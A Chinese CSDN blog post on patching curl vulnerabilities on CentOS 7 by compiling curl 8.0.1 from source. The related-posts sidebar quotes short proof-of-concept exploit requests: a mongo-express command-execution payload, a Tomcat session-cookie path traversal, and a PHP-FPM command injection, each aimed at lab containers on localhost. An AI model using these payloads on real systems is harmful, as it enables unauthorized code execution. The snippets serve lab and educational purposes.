Linux升级curl解决CVE-2019-3822和CVE-2019-5443漏洞

已于 2023-04-04 17:40:03 修改
阅读量955 收藏
点赞数
分类专栏: LINUX漏洞 文章标签: linux 服务器 运维
于 2023-04-04 17:39:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yue520you/article/details/129957807
版权

系统版本CentOS7.6
1.进入官网
https://curl.se/download.html

在这里插入图片描述

2.解压进入目录

tar xvf curl-8.0.1.tar.gz

cd curl-8.0.1

3.编译安装

./configure --prefix=/usr/local/curl --with-ssl


make

make install

4.写入环境变量

echo "export PATH=$PATH:/usr/local/curl/bin"  >> /etc/profile

source /etc/profile

5.进入安装后的bin目录下

cp -p curl /usr/bin/curl

查看版本

#curl -V
curl 8.0.1 (x86_64-pc-linux-gnu)

可能出现的报错,依赖包没安装全
安装如下rpm
在这里插入图片描述
内网无法安装就用下面RPM网站搜索包,下载后内网U盘上传服务器
网站(最好用的见下图,模糊搜索注意el6和el7版本)http://rpm.pbone.net/
网站https://pkgs.org/download/kernel
网站http://www.rpm-find.net/linux/rpm2html/search.php
在这里插入图片描述

空折
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2019-10758
03-08
CVE-2019-10758 PoC 设置 docker run -p 27017:27017 -d mongo npm install [email protected] cd node_modules/mongo-express/ && node app.js cURL利用 curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")' 脚本
CVE-2020-9484
04-13
CVE-2020-9484(Tomcat) 仅用于教育目的。 有关详细信息,请参见参考。 跑步 $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy 开发 $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' 查看 $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce
CVE-2019-11043-Docker
04-25
带有易受攻击PHP-FPM版本(CVE-2019-11043)和nginx的docker映像。 跑步 docker run --rm -p8080:80 akamajoris/cve-2019-11043您应该能够通过以下网址访问Web应用程序: 。 开发 从https://github.com/neex/phuip-fpizdam构建二进制文件,然后 root@debian:~/gopath/bin# curl "localhost:8080/?a=/bin/sh+-c+'which+which'" 1 root@debian:~/gopath/bin#./phuip-fpizdam http://localhost:8080/index.php 2019/10/24 08:53:00 Base status code is 200 2019/10/24 08:53:00 Status
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对Spring Data REST支持的HTTP资源提供特制的请求参数,或者使用Spring Data的基于投影的请求有效负载绑定帽可能导致远程代码执行攻击。 更多信息 跑步 可以使用易受攻击的版本或固定版本的Spring Data Commons测试该应用程序。 漏洞版本(默认情况下): mvn spring-boot:run 固定版本: mvn spring-boot:run -Dfixed 测试漏洞 运行以下命令以检查是否可以利用此漏洞: 在Windows上: curl -X POST http://localhost
三种打补丁方法
01-27
三种重阳用的打补丁方法
curl-7.59.0.zip
10-25
Curl is a command-line tool for transferring data specified with URL syntax. Find out how to use curl by reading [the curl.1 man page](https://curl.haxx.se/docs/manpage.html) or [the MANUAL document](https://curl.haxx.se/docs/manual.html). Find out how to install Curl
Mysql5.7.12高危漏洞升级修复
Dark不必
03-12 4937
问题描述 漏洞类型 数据库漏洞 CVSS评分 9.8 CVE编号 CVE-2019-3822 CNNVD编号 CNNVD-201902-124 CNVD编号 – CNCVE编号 CNCVE-20193822 BUGTRAQ – 详细描述 Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。MySQL Server是其中的一个数据库服务器组件。 Oracle MySQL Server中的Packaging(cURL)子组件存在安全漏洞。攻击者可利用该漏洞未授权读取数据,影响
CentOS6--升级MySQL(5→8)
qq_35321347的博客
11-04 897
环境: CentOS release 6.5 mysql-5.7.27 背景: 客户某次服务器环境安全扫描后,发现Oracle MySQL Server安全漏洞CVE-2019-5443和Oracle MySQL Server组件安全漏洞CVE-2019-5482。安检公司给出的建议是打补丁,但为防止后续仍然有其他漏洞出现决定直接把原MySQL进行升级。 目的: 通过将MySQL升级到8.0.22来解决上述漏洞。 操作: ...
centos7 mysql升级漏洞5.7.30
qq_40988607的博客
12-07 4476
公司安全扫描,发现mysql存在漏洞,高危漏洞编号为(CVE-2019-5482)、(CVE-2019-3822)、(CVE-2020-2804) 目前mysql版本为mysql-5.7.26,而以上漏洞存在与5.7.29,所以要升级mysql版本到5.7.30;以下为升级文档供大家参考; 转载请注明出处https://editor.csdn.net/md?not_checkout=1&articleId=110822451
CVE编号 CVE-2019-3822,CentOS7,Mysql 5.7.25升级到5.7.28
大西瓜的博客
04-07 7379
CVE编号 CVE-2019-3822,Mysql 5.7.25升级到5.7.28 官方说明 MYSQL下载地址 下载5.7.28 查看MYSQL版本 mysql -V 停止MYSQL, systemctl stop mysqld 安装libaio yum install libaio 卸载5.7.25安装5.7.28 rpm -qa |grep mysql |xargs rpm -ev --nodeps rpm -ivh mysql-community-common-5.7.28-1.el7.x8
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并在Mozilla错误跟踪器中分配了Bug 1559858 。 这是问题的摘要: Insufficient vetting of p
curl 身份认证绕过漏洞CVE-2023-27535)升级记录
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
08-08 715
curl在7.13.0-7.88.1版本中存在身份认证绕过漏洞。libcurl将重用之前所创建的FTP连接,即使一个或多个参数被更改,可能会使有效用户变得不一样,从而导致使用错误的凭据进行第二次传输。官网:http://curl.haxx.se/download/影响范围:curl 7.13.0 - 7.88.1。
MySQ漏洞修复
魏振东
08-22 3261
MySQ漏洞修复
mysql[漏洞打补丁]小版本升级5.7.25到5.7.28
m0_67401920的博客
04-07 1601
mysql[漏洞]小版本升级 事件背景 近日,公司进行安全扫描,发现mysql存在漏洞,高危漏洞编号为(CVE-2019-3822),此外还有多个中危,低危漏洞,目前mysql版本为5.7.25 解决方案 对mysql进行小版本升级到5.7.28,生产环境无法联网,用rpm 包离线安装,选择就地升级。 Mysql的两种升级方式 就地升级(In-place Upgrade) 关闭旧版本mysql,用新的替换旧的二进制文件或软件包,在现有数据目录上重启数据库,执行mysql_upgrade 逻辑升级(L
openssl漏洞怎么处理_拒绝超长函数,从两个curl远程漏洞说起
weixin_39569051的博客
11-27 794
「Tencent Blade Team」Leonwxqian<1> 背景 Tencent Blade Team在代码审计过程中发现了curl中存在两个可以通过NTLM远程触发的漏洞。这两个漏洞存在于curl在处理Type-2和Type-3消息的逻辑中。这两个漏洞分别为:(1)远程内存读取(CVE-2018-16890,https://curl.haxx.se/docs/CVE-201...
CVE-2019-5544问题处理
RedJones的博客
02-09 1295
CVE-2019-5544问题处理
TiDB修改版本号
李迟的专栏
08-05 3845
本文记录的是修改tidb数据库版本号信息,由于本文涉及知识点不多,没有技术含量,请谨慎按需阅读。more。
mysql server 组件cve_Oracle MySQL Server组件访问控制错误漏洞
weixin_42300113的博客
02-26 1934
来源:CONFIRM链接:https://support.f5.com/csp/article/K04246541来源:www.oracle.com链接:https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html来源:www.oracle.com链接:http://www.oracle.com/index...
Linux下更新curl版本
热门推荐
wd520521的博客
01-15 1万+
由于低版本的curl存在一定的漏洞,会对我们的服务器安全造成问题,所以,我们需要将curl由低版本安装到高版本。
Haxx curl 输入验证错误漏洞(CVE-2019-15601)
07-27
根据提供的引用内容,Haxxcurl存在输入验证错误漏洞(CVE-2019-15601)。这个漏洞源于Haxxcurl在处理URL时未正确验证输入数据,导致攻击者可以利用该漏洞来执行恶意操作,例如覆盖本地文件。\[1\]为了解决这个漏洞,建议升级到Haxxcurl的7.71.0版本或更高版本。\[1\]此外,还需要注意其他相关的安全漏洞,比如Apache Tomcat的安全漏洞(CVE-2021-25122)。\[2\]同时,Haxx libcurl中也存在缓冲区错误漏洞,攻击者可以利用该漏洞导致缓冲区溢出或堆溢出等。\[3\]因此,为了确保系统的安全性,建议及时更新相关软件和库,并采取其他安全措施来保护系统免受潜在的攻击。 #### 引用[.reference_title] - *1* [漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)](https://blog.csdn.net/qq_29974229/article/details/127864842)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Centos7系统安全漏洞及修复方案](https://blog.csdn.net/Sara_cloud/article/details/115456192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值